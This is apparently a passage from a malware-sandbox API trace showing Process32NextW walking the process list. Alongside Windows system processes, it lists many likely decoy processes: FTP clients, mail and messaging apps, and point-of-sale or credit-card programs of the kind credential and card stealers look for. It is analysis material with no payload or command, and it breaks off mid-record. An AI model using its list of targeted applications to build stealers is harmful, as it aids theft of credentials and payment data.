Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.704] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.705] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.705] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.706] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.706] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.707] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.707] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.708] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.708] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.709] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.709] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.710] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.712] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0099.713] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.713] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0099.714] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="chelsea.exe")) returned 1 [0099.715] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="temperature_lowest.exe")) returned 1 [0099.715] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="holmes rejected dividend.exe")) returned 1 [0099.716] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="enters.exe")) returned 1 [0099.716] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="championshipsmpegs.exe")) returned 1 [0099.717] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alfred_both.exe")) returned 1 [0099.717] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="facilitatebranchesanymore.exe")) returned 1 [0099.718] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="releases.exe")) returned 1 [0099.719] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediterranean.exe")) returned 1 [0099.719] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="junk_ti.exe")) returned 1 [0099.720] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gps_conduct_strips.exe")) returned 1 [0099.720] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="appealfaqcove.exe")) returned 1 [0099.721] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="generated.exe")) returned 1 [0099.721] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbaemotions.exe")) returned 1 [0099.722] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="cowdirector.exe")) returned 1 [0099.722] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pill sri.exe")) returned 1 [0099.723] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightweight-yr.exe")) returned 1 [0099.723] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="somerset_concluded_twice.exe")) returned 1 [0099.725] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.727] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.727] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.728] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.728] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.729] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.729] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0099.730] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.730] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.731] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.731] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.732] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.733] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.733] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.734] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.735] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.736] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.737] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0099.737] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.738] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.739] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.740] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.742] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0099.743] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.743] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.744] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.745] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.746] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.746] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.747] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.748] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.748] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.749] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.750] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.750] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.751] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.752] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.752] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.753] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.754] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.754] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.755] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.756] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.756] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.757] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="numerous-worm-coding.exe")) returned 1 [0099.758] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0099.758] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="anadecadessrc.exe")) returned 1 [0099.759] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.759] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.760] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.761] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x458, pcPriClassBase=8, 